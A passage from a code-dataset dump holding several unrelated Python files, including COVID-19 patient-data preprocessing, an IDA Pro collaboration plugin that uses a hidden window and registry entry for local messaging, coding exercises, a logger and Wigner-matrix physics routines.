Calcium','Blood Amylase','Activated Partial Thromboplastin Time (aPTT)',\n 'ABG: standard bicarbonate (sHCO3)','ABG: pH','ABG: PaO2','ABG: PaCO2','ABG: Lactic Acid',\n 'ABG: Base Excess','D-Dimer','Glycemia','ABG: Oxygen Saturation (SaO2)a','ABG: Oxygen Saturation (SaO2)b']\n\nLAB_COLS = ['PATIENT.ID','FECHA_PETICION.LAB_DATE','DETERMINACION.ITEM_LAB','RESULTADO.VAL_RESULT']\n\nLAB_FEATURES = ['PATIENT ID', 'Total Bilirubin','Aspartate Aminotransferase (AST)',\n 'CBC: Leukocytes','CBC: Hemoglobin', 'CBC: Mean Corpuscular Volume (MCV)',\n 'Alanine Aminotransferase (ALT)','Blood Sodium',\n 'Prothrombin Time (INR)','Potassium Blood Level','Cholinesterase',\n 'CBC: Platelets','C-Reactive Protein (CRP)','Blood Creatinine',\n 'Blood Calcium','Blood Amylase','ABG: standard bicarbonate (sHCO3)',\n 'ABG: pH','ABG: PaO2','ABG: PaCO2','ABG: Lactic Acid',\n 'ABG: Base Excess','D-Dimer','Glycemia','Blood Urea Nitrogen (BUN)','ABG: Oxygen Saturation (SaO2)']\n\nHCUP_LIST = [49,50,87,90,95,146]\n\n\nCREMONA_EXTRA = ['ABG: COHb', 'ABG: MetHb',\n 'Activated Partial Thromboplastin Time (aPTT)',\n 'CBC: Red cell Distribution Width (RDW)',\n 'Respiratory Frequency']\n\n\ndef missing_values_table(df):\n mis_val = df.isnull().sum()\n mis_val_percent = 100 * df.isnull().sum() / len(df)\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\n mis_val_table_ren_columns = mis_val_table.rename(\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\n mis_val_table_ren_columns = mis_val_table_ren_columns[\n mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\n '% of Total Values', ascending=False).round(1)\n print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\"\n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\n \" columns that have missing values.\")\n return mis_val_table_ren_columns\n\n\n\ndef create_dataset_admissions(admission):\n\n #Rename the columns for the admission\n admission = admission.rename(columns=RENAMED_ADMISSION_COLUMNS)\n\n #Limit to only patients for whom we know the outcome\n types = ['Fallecimiento', 'Domicilio']\n admission = admission.loc[admission['Outcome'].isin(types)]\n #Dictionary for the outcome\n death_dict = {'Fallecimiento': 1,'Domicilio': 0}\n admission.Outcome = [death_dict[item] for item in admission.Outcome]\n\n #Convert to Dates the appropriate information\n admission['Date_Emergency']= pd.to_datetime(admission['Date_Emergency']).dt.date\n admission['Date_Admission']= pd.to_datetime(admission['Date_Admission']).dt.date\n\n df1 = admission[ADMISSION_COLUMNS]\n\n return df1\n\n\ndef create_dataset_demographics(admission):\n #Rename the columns for the admission\n admission = admission.rename(columns=RENAMED_ADMISSION_COLUMNS)\n\n #Dictionary for the gender\n gender = {'MALE': 0,'FEMALE': 1}\n admission.Gender = [gender[item] for item in admission.Gender]\n\n df2 = admission[DEMOGRAPHICS_COLUMNS]\n return df2\n\n\ndef create_vitals_dataset(admission):\n #Rename the columns for the admission\n admission = admission.rename(columns=RENAMED_ADMISSION_COLUMNS)\n #Reformatting the vital values at the emergency department\n admission['Body Temperature'] = admission['Body Temperature'].replace('0',np.nan).str.replace(',','.').astype(float)\n #Convert to Fahrenheit\n admission['Body Temperature'] = fahrenheit_covert(admission['Body Temperature'])\n\n admission['Cardiac Frequency']=admission['Cardiac Frequency'].replace(0,np.nan)\n admission['SaO2']=admission['SaO2'].replace(0,np.nan)\n admission['Glycemia']=admission['Glycemia'].replace(0,np.nan)\n admission['Systolic Blood Pressure']=admission['Systolic Blood Pressure'].replace(0,np.nan)\n\n df3 = admission[VITAL_COLUMNS]\n\n df3 = remove_missing(df3)\n\n return df3\n\n\ndef create_lab_dataset(labs, dataset_admissions, dataset_vitals):\n\n labs['DETERMINACION.ITEM_LAB'] = labs['DETERMINACION.ITEM_LAB'].replace(RENAMED_LAB_MEASUREMENTS)\n\n #Limit to only rows for the ones known in Italy\n labs = labs.loc[labs['DETERMINACION.ITEM_LAB'].isin(LAB_METRICS)]\n #Reduce the number of columns\n labs = labs[LAB_COLS]\n\n #Convert to Date the date column\n labs['FECHA_PETICION.LAB_DATE']= pd.to_datetime(labs['FECHA_PETICION.LAB_DATE']).dt.date\n labs['RESULTADO.VAL_RESULT'] = labs['RESULTADO.VAL_RESULT'].str.extract('(\\d+(?:\\.\\d+)?)', expand=False).astype(float)\n\n #Convert to wide format\n df2 = labs.pivot_table(index=['PATIENT.ID','FECHA_PETICION.LAB_DATE'], columns='DETERMINACION.ITEM_LAB', values='RESULTADO.VAL_RESULT')\n df2=pd.DataFrame(df2.to_records())\n\n df2['PATIENT.ID'] = df2['PATIENT.ID'].astype(int)\n\n #Createe Blood Urea Nitrogen from Urea\n df2['Blood Urea Nitrogen (BUN)'] = df2['Urea']/2.14\n #Drop Urea\n df2 = df2.drop(columns=['Urea'])\n\n #Oxygen levels\n df2['ABG: Oxygen Saturation (SaO2)'] = df2['ABG: Oxygen Saturation (SaO2)a']\n\n for (index_label, row_series) in df2.iterrows():\n if np.isnan(df2['ABG: Oxygen Saturation (SaO2)'].iloc[index_label]) and dataset_vitals['PATIENT ID'].isin([row_series['PATIENT.ID']]).any():\n df2['ABG: Oxygen Saturation (SaO2)'].iloc[index_label] = dataset_vitals[dataset_vitals['PATIENT ID']==row_series['PATIENT.ID']]['SaO2'].iloc[0]\n\n df2 = df2.drop(columns=['ABG: Oxygen Saturation (SaO2)a','ABG: Oxygen Saturation (SaO2)b'])\n\n\n #Merge the two dataframes admissions and labs together.\n df3 = pd.merge(dataset_admissions, df2, how='inner', left_on=['PATIENT ID','Date_Emergency'], right_on=['PATIENT.ID','FECHA_PETICION.LAB_DATE'])\n #df4 = pd.merge(df1, df2, how='inner', left_on=['PATIENT ID','Date_Admission'], right_on=['PATIENT.ID','FECHA_PETICION.LAB_DATE'])\n df3 = df3.drop(columns=['PATIENT.ID','FECHA_PETICION.LAB_DATE'])\n\n dataset_lab_full = df3[LAB_FEATURES]\n dataset_lab_full = pd.DataFrame(dataset_lab_full.groupby(['PATIENT ID'], as_index=False).first())\n\n dataset_lab_full = remove_missing(dataset_lab_full)\n\n return dataset_lab_full\n\n\ndef prepare_dataset_comorbidities(comorbidities_emerg, comorbidities_inpatient):\n #Convert them to a long format\n comorb_long1=pd.melt(comorbidities_emerg,id_vars=['PATIENT ID'],var_name='DiagOrdering', value_name='values')\n comorb_long2=pd.melt(comorbidities_inpatient,id_vars=['PATIENT ID'],var_name='DiagOrdering', value_name='values')\n #Concatanate the two dataframes\n comorb_long = pd.concat([comorb_long1,comorb_long2])\n\n #We will treat all types of diagnoses the same\n comorb_long = comorb_long.drop(['DiagOrdering'], axis=1)\n #Remove NA values\n comorb_long=comorb_long.dropna()\n #Convert PATIENT ID to integer\n comorb_long['PATIENT ID'] = comorb_long['PATIENT ID'].astype(int)\n #Remove the dot from the values column\n comorb_long['values']= comorb_long['values'].str.replace(\".\",\"\")\n return comorb_long\n\ndef create_dataset_comorbidities(comorb_long, icd_category, dataset_admissions):\n\n #Load the diagnoses dict\n if icd_category == 9:\n icd_dict = pd.read_csv('analyzer/hcup_dictionary_icd9.csv')\n else:\n icd_dict = pd.read_csv('analyzer/hcup_dictionary_icd10.csv')\n\n #The codes that are not mapped are mostly procedure codes or codes that are not of interest\n icd_descr = pd.merge(comorb_long, icd_dict, how='inner', left_on=['values'], right_on=['DIAGNOSIS_CODE'])\n\n #Now we need to restrict to the categories for which we have italian data\n # cardiac arrhythmia -> 106\n # acute renal failure -> 145\n # chronic kidney disease -> 146\n # CAD, heart disease -> 90\n # diabetes -> 49, 50\n # hypertension -> 87\n\n #Create a list with the categories that we want\n comorb_descr = icd_descr.loc[icd_descr['HCUP_ORDER'].isin(HCUP_LIST)]\n\n #Limit only to the HCUP Description and drop the duplicates\n comorb_descr = comorb_descr[['PATIENT ID','GROUP_HCUP']].drop_duplicates()\n\n #Convert from long to wide format\n comorb_descr = pd.get_dummies(comorb_descr, prefix=['GROUP_HCUP'])\n\n #Now we will remove the GROUP_HCUP_ from the name of each column\n comorb_descr = comorb_descr.rename(columns = lambda x: x.replace('GROUP_HCUP_', ''))\n\n #Let's combine the diabetes columns to one\n comorb_descr['Diabetes'] = comorb_descr[[\"Diabetes mellitus with complications\", \"Diabetes mellitus without complication\"]].max(axis=1)\n\n #Drop the other two columns\n comorb_descr = comorb_descr.drop(columns=['Diabetes mellitus with complications', 'Diabetes mellitus without complication'])\n\n dataset_comorbidities = pd.DataFrame(comorb_descr.groupby(['PATIENT ID'], as_index=False).max())\n\n # Combine the comorbidities with the main filees\n dataset_comorbidities = pd.merge(dataset_admissions['PATIENT ID'], dataset_comorbidities, how='left', left_on=['PATIENT ID'], right_on=['PATIENT ID'])\n dataset_comorbidities = dataset_comorbidities.fillna(0)\n\n return dataset_comorbidities\n\n\ndef add_extra_features(dataset_admissions):\n\n dataset_extra = dataset_admissions['PATIENT ID'].to_frame()\n\n for i in CREMONA_EXTRA:\n dataset_extra[i] = np.nan\n return dataset_extra\n\ndef filter_patients(datasets):\n patients = datasets[0]['PATIENT ID'].astype(np.int64)\n\n # Get common patients\n for d in datasets[1:]:\n patients = d[d['PATIENT ID'].astype(np.int64).isin(patients)]['PATIENT ID'].unique()\n\n # Remove values not in patients (in place)\n for d in datasets:\n d.drop(d[~d['PATIENT ID'].astype(np.int64).isin(patients)].index, inplace=True)\n return patients\n\ndef fahrenheit_covert(temp_celsius):\n temp_fahrenheit = ((temp_celsius * 9)/5)+ 32\n return temp_fahrenheit\n\n","repo_name":"COVIDAnalytics/covid19_hypertensive_treatments","sub_path":"calculator/analyzer/loaders/hmfundacion/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30031656937","text":"import idaapi\nimport ctypes\nimport win32api\nimport win32gui\nimport win32con\nimport winnt\nimport os\nimport struct\nimport constants\nimport shared\nfrom all_events import *\nimport time\n\ndef log(data):\n\tprint(\"[Integrator] \" + data)\n\ndef create_hidden_window():\n\twindow_handler = win32gui.CreateWindow(\"EDIT\", \"Integrator window hook\", 0, 0, 0, 0, 0, 0, 0, 0, None)\n\tif not window_handler:\n\t\traise Exception(\"Cannot create hidded window!\")\n\twin32gui.SetWindowLong(window_handler, win32con.GWL_WNDPROC, message_handler)\n\treturn window_handler\n\ndef insert_to_registery(window_handle):\n\tid_of_instance = struct.unpack(\">I\", os.urandom(4))[0]\n\ttry:\n\t\tkey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, constants.SUBMODULE_KEY, 0, win32con.KEY_ALL_ACCESS)\n\texcept Exception:\n\t\tkey = win32api.RegCreateKeyEx(win32con.HKEY_CURRENT_USER, constants.SUBMODULE_KEY, win32con.KEY_ALL_ACCESS, None, winnt.REG_OPTION_NON_VOLATILE, None)[0]\n\twin32api.RegSetValueEx(key, str(id_of_instance), 0, win32con.REG_SZ, str(window_handle))\n\treturn id_of_instance\n\t\n\ndef remove_key_from_reg(id_of_instance):\n\tkey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, constants.SUBMODULE_KEY, 0, win32con.KEY_ALL_ACCESS)\n\tif key:\n\t\twin32api.RegDeleteValue(key, str(id_of_instance))\n\ndef message_handler(window_handler, msg, wParam, lParam):\n\tif wParam == constants.SEND_DATA_TO_IDA: #pass\n\t\tcopy_data = ctypes.cast(lParam, constants.PCOPYDATASTRUCT)\n\t\tevent_data = json.loads(ctypes.string_at(copy_data.constants.lpData))\n\t\tevent_object = create_event_from_dict(event_data)\n\t\tlog(\"Received object: \" + str(event_data))\n\t\tevent_object.implement()\n\treturn True\n\ndef create_event_from_dict(json_dict):\n\tevent_id = json_dict[\"id\"]\n\tevent_data = json_dict[\"data\"]\n\tif event_id == constants.CHANGE_FUNCTION_NAME_ID:\n\t\treturn ChangeFunctionNameEvent(event_data[\"value\"], event_data[\"linear-address\"])\n\telif event_id == constants.CHANGE_GLOBAL_VARIABLE_NAME_ID:\n\t\treturn ChangeGlobalVariableNameEvent(event_data[\"linear-address\"], event_data[\"value\"], event_data[\"label-type\"])\n\telif event_id == constants.CHANGE_LABEL_NAME_ID:\n\t\treturn ChangeLabelNameEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.SET_COMMENT_ID:\n\t\treturn ChangeCommentEvent(event_data[\"linear-address\"], event_data[\"value\"], event_data[\"comment-type\"])\n\telif event_id == constants.CHANGE_TYPE_ID:\n\t\treturn ChangeTypeEvent(event_data[\"linear-address\"], event_data[\"variable-type\"])\n\telif event_id == constants.NEW_FUNCTION_ID:\n\t\treturn NewFunctionEvent(event_data[\"linear-address-start\"],event_data[\"linear-address-end\"])\n\telif event_id == constants.UNDEFINE_DATA_ID:\n\t\treturn UndefineDataEvent(event_data[\"linear-address\"])\n\telif event_id == constants.CHANGE_FUNCTION_START_ID:\n\t\treturn ChangeFunctionStartEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.CHANGE_FUNCTION_END_ID:\n\t\treturn ChangeFunctionEndEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.CREATE_STRUCT_ID:\n\t\treturn CreateStructEvent(event_data[\"name\"], event_data[\"id\"])\n\telif event_id == constants.CREATE_STRUCT_VARIABLE_ID:\n\t\treturn CreateStructVariableEvent(event_data[\"id\"], event_data[\"offset\"], event_data[\"variable-type\"])\n\telif event_id == constants.DELETE_STRUCT_VARIABLE_ID:\n\t\treturn DeleteStructVariableEvent(event_data[\"id\"], event_data[\"offset\"])\n\telif event_id == constants.DELETE_STRUCT_ID:\n\t\treturn DeleteStructEvent(event_data[\"id\"])\n\telif event_id == constants.CHANGE_STRUCT_NAME_ID:\n\t\treturn ChangeStructNameEvent(event_data[\"id\"], event_data[\"value\"])\n\telif event_id == constants.CREATE_ENUM_ID:\n\t\treturn CreateEnumEvent(event_data[\"name\"], event_data[\"id\"])\n\telif event_id == constants.CREATE_ENUM_ITEM_ID:\n\t\treturn CreateEnumItemEvent(event_data[\"id\"], event_data[\"name\"], event_data[\"value\"])\n\telif event_id == constants.DELETE_ENUM_ID:\n\t\treturn DeleteEnumEvent(event_data[\"id\"])\n\telif event_id == constants.CHANGE_ENUM_NAME_ID:\n\t\treturn ChangeEnumNameEvent(event_data[\"id\"], event_data[\"value\"])\n\telif event_id == constants.CHANGE_FUNCTION_HEADER_ID:\n\t\treturn ChangeFunctionHeaderEvent(event_data[\"linear-address\"], event_data[\"value\"])\n\telif event_id == constants.IDA_CURSOR_CHANGE_ID:\n\t\treturn IDACursorEvent(event_data[\"linear-address\"])\n\telif event_id == constants.EXIT_FROM_IDA_ID:\n\t\treturn ExitIDBEvent()\n\telif event_id == constants.START_IDA_ID:\n\t\treturn StartIDAEvent()\n\telif event_id == constants.CHANGE_STRUCT_MEMBER_NAME_ID:\n\t\treturn ChangeStructItemEvent(event_data[\"id\"], event_data[\"offset\"], event_data[\"value\"])\n\telif event_id == constants.DELETE_ENUM_MEMBER_ID:\n\t\treturn DeleteEnumMemberEvent(event_data[\"id\"], event_data[\"value\"])\n\nclass integrator(idaapi.UI_Hooks, idaapi.plugin_t):\n\tflags = idaapi.PLUGIN_HIDE | idaapi.PLUGIN_FIX\n\tcomment = \" \"\n\thelp = \" \"\n\twanted_name = \"Integrator\"\n\twanted_hotkey = \"\"\n\n\tdef run(self):\n\t\tpass\n\n\tdef init(self):\t\n\t\tself._window_handler = create_hidden_window()\n\t\tself._id = insert_to_registery(self._window_handler)\n\t\tlog(\"Created window\")\n\t\tshared.INTEGRATOR_WINDOW_ID = self._id\n\t\tshared.COMMUNICATION_MANAGER_WINDOW_ID = struct.unpack(\">I\", os.urandom(4))[0]\n\t\tshared.start_communication_manager()\n\t\ttime.sleep(1)\n\t\tshared.IS_COMMUNICATION_MANAGER_STARTED = True\n\t\tif shared.USERID != -1: #started.\n\t\t\tcommunication_manager_window_handler = constants.get_window_handler_by_id(shared.COMMUNICATION_MANAGER_WINDOW_ID)\n\t\t\tconstants.send_data_to_window(communication_manager_window_handler, constants.CHANGE_PROJECT_ID, json.dumps({\"project-id\": shared.PROJECT_ID}))\n\t\t\tconstants.send_data_to_window(communication_manager_window_handler, constants.CHANGE_USER, json.dumps({\"username\":shared.USERNAME, \"id\": shared.USERID, \"token\": shared.USER_TOKEN}))\n\n\t\treturn idaapi.PLUGIN_KEEP\n\n\tdef term(self):\n\t\tremove_key_from_reg(self._id)\n\t\tself._id = 0\n\t\t\ndef PLUGIN_ENTRY():\n\treturn integrator()\n","repo_name":"lolblat/IReal","sub_path":"integrator.py","file_name":"integrator.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38615998386","text":"#for five or more words returns them reversed\n\ndef spin_words(sentence):\n # Your code goes here\n old_list = sentence.split()\n new_list = []\n for i in range(len(old_list)):\n if len(old_list[i]) > 4:\n reversed = old_list[i][::-1]\n new_list.append(reversed)\n else:\n new_list.append(old_list[i])\n\n return \" \".join(new_list)\n\nprint(spin_words(\"Hey fellow warriors\"))\n\n\n\n\n\n# spinWords( \"Hey fellow warriors\" ) => returns \"Hey wollef sroirraw\" \n# spinWords( \"This is a test\") => returns \"This is a test\" \n# spinWords( \"This is another test\" )=> returns \"This is rehtona test\"","repo_name":"suhel954/personal_projects","sub_path":"python_practice/codewars/spinning_words.py","file_name":"spinning_words.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5563043159","text":"class ContaCorrente:\n def __init__(self, codigo):\n self.codigo = codigo\n self.saldo = 0\n\n def depositar(self, valor):\n self.saldo += valor\n\n def __str__(self):\n return f'Código: {self.codigo} - Saldo: {self.saldo}'\n\n\nconta_do_gui = ContaCorrente(15)\nconta_do_gui.depositar(500)\n\nconta_da_dani = ContaCorrente(47685)\nconta_da_dani.depositar(500)\n\ncontas = [conta_do_gui, conta_da_dani]\nfor conta in contas:\n print(conta)\n\ncontas = [conta_do_gui, conta_da_dani, conta_do_gui]\nprint(contas[0])\n\n\ndef deposita_para_todas_as_contas(contas_a_receber, valor):\n for conta_a_receber in contas_a_receber:\n conta_a_receber.depositar(valor)\n\n\n# contas.insert(0, 70)\ndeposita_para_todas_as_contas(contas, 100)\nprint(conta_do_gui)\n\nguilherme = ('Guilherme', 37, 1981)\ndaniela = ('Daniela', 35, 1980)\n\nusuarios = (guilherme, daniela, ('João', 30, 1975))\n","repo_name":"tadeubdev/python-collections-listas-e-tuplas-na-alura","sub_path":"conta_corrente.py","file_name":"conta_corrente.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16346900773","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 28 18:52:58 2018\r\n\r\n@author: nit_n\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\n\r\npart = input(str(\"what part would you like to do (a, b, or c)? \"))\r\n\r\n\r\nif part in ['a']:\r\n print(\"see derivation sheet\")\r\n \r\nif part in ['b']:\r\n \r\n # functions f and g, where a = 1 and b = 2\r\n def f(x,y):\r\n return y*(1 + x*x)\r\n def g(x,y):\r\n return 2/(1 + x*x)\r\n \r\n # counter, starting x and y values\r\n n = 0\r\n x = 1\r\n y = 1\r\n \r\n print(\"see derivation sheet\")\r\n while n < 5:\r\n n = n + 1\r\n xp = f(x,y)\r\n x = xp\r\n yp = g(x,y)\r\n y = yp\r\n print(\"n =\", n)\r\n print(\"x =\", x)\r\n print(\"y =\", y)\r\n print(\"------------------------\")\r\n \r\n print(\"does not converge\")\r\n \r\nif part in ['c']: \r\n \r\n# functions f and g, where a = 1 and b = 2\r\n def f(x,y):\r\n return sqrt((2 - y)/y)\r\n def g(x,y):\r\n return x/(1 + x*x)\r\n \r\n # counter, starting x and y values\r\n n = 0\r\n x = 1\r\n y = 1\r\n \r\n while n < 40:\r\n n = n + 1\r\n xp = f(x,y)\r\n x = xp\r\n yp = g(x,y)\r\n y = yp\r\n print(\"n =\", n)\r\n print(\"x =\", x)\r\n print(\"y =\", y)\r\n print(\"------------------------\")\r\n \r\n print(\"actual: x = 2, y = 0.4\")\r\n \r\n \r\n \r\n \r\n ","repo_name":"nrwade0/computational-physics","sub_path":"6/6_12_n_w.py","file_name":"6_12_n_w.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27619036289","text":"import click\n\n\nclass Logger():\n\n def __init__(self, name):\n self.name = name\n\n def log(self, message):\n click.echo(\n click.style(self.name + ' ', dim=True)\n + message\n )\n\n def warn(self, message):\n style = {'bg': 'blue', 'fg': 'white', 'bold': True}\n message = (\n click.style(self.name + ' ', dim=True)\n + click.style(' {} '.format(message), **style)\n )\n click.echo(message, err=True)\n\n def err(self, message):\n style = {'bg': 'red', 'fg': 'white', 'bold': True}\n message = (\n click.style(self.name + ' ', dim=True)\n + click.style(' {} '.format(message), **style)\n )\n click.echo(message, err=True)\n\n def prompt(self, message, **kwargs):\n message = (\n click.style(self.name + ' ', dim=True) + message\n )\n return click.prompt(message, **kwargs)\n","repo_name":"honzajavorek/foto","sub_path":"foto/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"12037569057","text":"# a=[1,2,3,4,5]\n# counter=0\n# for i in range(0,len(a)):\n# counter+=a[i]\n# print(a[i])\n# print(\"Total=\",counter)\n\n\n\ndef multi(list1):\n counter=1\n for i in range(0,len(list1)):\n counter*=list1[i]\n\n\n return counter\n \n\nlist1=[1,2,3,4,5]\nprint(multi(list1))","repo_name":"mohitsh7979/python_programming","sub_path":"sumoflist.py","file_name":"sumoflist.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23354651922","text":"\"\"\"\nThis file contains functions to compute wigner matrices used in wigner transform (power spectra to correlation functions) \nand wigner_3j matrices used in window function calculations. \n\"\"\"\n\nimport numpy as np\nfrom scipy.special import binom,jn,loggamma\nfrom scipy.special import eval_jacobi as jacobi\nfrom multiprocessing import Pool,cpu_count\nfrom functools import partial\nimport sparse\nfrom sympy import Integer\nfrom sympy import sqrt as sy_sqrt\nfrom sympy import exp as sy_exp\nfrom sympy import log as sy_log\n\nfrom mpmath import exp as mp_exp\nfrom mpmath import log as mp_log\nfrom sympy.physics.wigner import wigner_3j\n\n\ndef wigner_d(m1,m2,theta,l,l_use_bessel=1.e4):\n \"\"\"\n Function to compute wigner matrices used in wigner transforms.\n \"\"\"\n l0=np.copy(l)\n if l_use_bessel is not None:\n #FIXME: This is not great. Due to a issues with the scipy hypergeometric function,\n #jacobi can output nan for large ell, l>1.e4\n # As a temporary fix, for ell>1.e4, we are replacing the wigner function with the\n # bessel function. Fingers and toes crossed!!!\n # mpmath is slower and also has convergence issues at large ell.\n #https://github.com/scipy/scipy/issues/4446\n \n l=np.atleast_1d(l)\n x=l<l_use_bessel\n l=np.atleast_1d(l[x])\n k=np.amin([l-m1,l-m2,l+m1,l+m2],axis=0)\n a=np.absolute(m1-m2)\n lamb=0 #lambda\n if m2>m1:\n lamb=m2-m1\n b=2*l-2*k-a\n d_mat=(-1)**lamb\n d_mat*=np.sqrt(binom(2*l-k,k+a)) #this gives array of shape l with elements choose(2l[i]-k[i], k[i]+a)\n d_mat/=np.sqrt(binom(k+b,b))\n d_mat=np.atleast_1d(d_mat)\n x=k<0\n d_mat[x]=0\n\n d_mat=d_mat.reshape(1,len(d_mat))\n theta=theta.reshape(len(theta),1)\n d_mat=d_mat*((np.sin(theta/2.0)**a)*(np.cos(theta/2.0)**b))\n x=d_mat==0\n d_mat*=jacobi(k,a,b,np.cos(theta)) #l\n d_mat[x]=0\n \n if l_use_bessel is not None:\n l=np.atleast_1d(l0)\n x=l>=l_use_bessel\n l=np.atleast_1d(l[x])\n# d_mat[:,x]=jn(m1-m2,l[x]*theta)\n d_mat=np.append(d_mat,jn(m1-m2,l*theta),axis=1)\n return d_mat\n\ndef wigner_d_parallel(m1,m2,theta,l,ncpu=None,l_use_bessel=1.e4):\n \"\"\"\n Compute wigner matrix in parallel.\n \"\"\"\n if ncpu is None:\n ncpu=cpu_count()\n p=Pool(ncpu)\n d_mat=np.array(p.map(partial(wigner_d,m1,m2,theta,l_use_bessel=l_use_bessel),l))\n p.close()\n p.join()\n return d_mat[:,:,0].T\n\n# def wigner_d_recur(m1,m2,theta,l,l_use_bessel=1.e4): #FIX: Can use recursion reltion from Kilbinger+ 2017\n# dmat=np.zeros((len(theta),len(l)))\n# theta=theta.reshape(len(theta),1)\n# l=l.reshape(1,len(l))\n# d100=np.cos(theta)\n \n# A0=l*(2.*l-1.)\n\n# A0/=np.sqrt((l**2-m1**2)*(l**2-m2**2))\n# A1=d100-m1*m2*1.0/l/(l-1.)\n# A2=np.sqrt(((l-1)**2-m1**2)*((l-1)**2-m2**2))\n# A2/=(l-1)*(2*l-1)\n# il=0\n# for i in np.arange(len(l[0,:])):\n# if l[0,i]<np.absolute(m1) or l[0,i]<np.absolute(m2):\n# continue\n# if il<=2:\n# dmat[:,i]=wigner_d(m1,m2,theta,np.atleast_1d(l[0,i]),l_use_bessel=l_use_bessel)[:,0]\n# il+=1\n# else:\n# dmat[:,i]=A1[:,i]*dmat[:,i-1]-A2[0,i]*dmat[:,i-2]\n# dmat[:,i]*=A0[0,i]\n# return dmat\n\n\ndef log_factorial(n):\n return loggamma(n+1)\n\ndef Wigner3j(m_1, m_2, m_3,j_1, j_2, j_3): #Failed attempt to convert sympy function into numpy. Doesnot work at large ell because of numerical errors\n \"\"\"Calculate the Wigner 3j symbol `Wigner3j(j_1,j_2,j_3,m_1,m_2,m_3)`\n *Has problems due to rounding errors when numbers get large.*\n This function is inspired from implementation in\n sympy.physics.Wigner, as written by Jens Rasch.\n https://docs.sympy.org/latest/modules/physics/wigner.html\n\n We have modified the implementation to use log_factorial so as to\n avoid dealing with large numbers. This function also accepts\n j_1,j_2,j_3 as 1d arrays (can be of different size) and returns\n a sparse matrix of size n_1 X n_2 X n_3, where n_i is the length of j_i.\n m_i should be integer scalars.\n For sparse package, see https://pypi.org/project/sparse/\n\n Following from sympy implementation:\n The inputs must be integers. (Half integer arguments are\n sacrificed so that we can use numba.) Nonzero return quantities\n only occur when the `j`s obey the triangle inequality (any two\n must add up to be as big as or bigger than the third).\n\n Examples\n ========\n\n >>> from spherical_functions import Wigner3j\n >>> Wigner3j_log(2, 6, 4, 0, 0, 0)\n 0.186989398002\n >>> Wigner3j_log(2, 6, 4, 0, 0, 1)\n 0\n \"\"\"\n j_1=j_1.reshape(len(np.atleast_1d(j_1)),1,1)\n j_2=j_2.reshape(1,len(np.atleast_1d(j_2)),1)\n j_3=j_3.reshape(1,1,len(np.atleast_1d(j_3)))\n\n x0=np.logical_not(np.any([ j_1 + j_2 - j_3<0, #triangle inequalities\n j_1 - j_2 + j_3<0,\n -j_1 + j_2 + j_3<0,\n abs(m_1) > j_1+j_2*0+j_3*0, #|m_i|<j_i\n abs(m_2) > j_2+j_1*0+j_3*0,\n abs(m_3) > j_3+j_2*0+j_1*0\n ],axis=0))\n\n if (m_1 + m_2 + m_3 != 0 or x0.sum()==0):\n return np.zeros_like(j_1+j_2+j_3,dtype='float64')\n\n\n a={1:(j_1 + j_2 - j_3)[x0]}\n\n m_3 = -m_3\n\n log_argsqrt =( log_factorial(j_1 - m_1) +\n log_factorial(j_1 + m_1) +\n log_factorial(j_2 - m_2) +\n log_factorial(j_2 + m_2) +\n log_factorial(j_3 - m_3) +\n log_factorial(j_3 + m_3)\n )[x0]\n\n log_argsqrt+=(log_factorial(a[1]) +\n log_factorial(( j_1 - j_2 + j_3)[x0]) +\n log_factorial((-j_1 + j_2 + j_3)[x0]) - log_factorial((j_1+j_2+j_3)[x0]+ 1))\n\n log_ressqrt=0.5*log_argsqrt\n log_argsqrt=None\n\n# imin = max(-j_3 + j_1 + m_2, max(-j_3 + j_2 - m_1, 0))\n imin_t=(-j_3 + j_2 - m_1 +j_1*0 ).clip(min=0)[x0]\n imin = (-j_3 + j_1 + m_2 +j_2*0)[x0]\n imin[imin<imin_t]=imin_t[imin<imin_t]\n imin_t=None\n\n# imax = min(j_2 + m_2, min(j_1 - m_1, j_1 + j_2 - j_3))\n imax_t=(j_1 - m_1 + j_2*0+j_3*0)[x0]\n imax =(j_1 + j_2 - j_3)[x0]\n imax[imax>imax_t]=imax_t[imax>imax_t]\n imax_t=(j_2 + m_2 + j_1*0+j_3*0)[x0]\n imax[imax>imax_t]=imax_t[imax>imax_t]\n imax_t=None\n\n\n iis=np.arange(np.amin(imin), np.amax(imax) + 1) #no need to use x0 here. Can also lead to somewhat wrong answers\n sgns=np.ones_like(iis,dtype='int')*-1\n sgns[iis%2==0]=1\n\n b1=(j_3 - j_1 - m_2 +j_2*0)[x0]\n b2=(j_2 + m_2 +j_1*0+j_3*0)[x0]\n b3=(j_1-m_1 +j_2*0+j_3*0)[x0]\n b4=(j_3 - j_2 + m_1 +j_1*0)[x0]\n sumres_t=np.zeros_like(b1,dtype='float')\n\n for i in np.arange(len(iis)):\n ii=iis[i]\n x=np.logical_not(np.logical_or(ii<imin,ii>imax))\n log_den =( 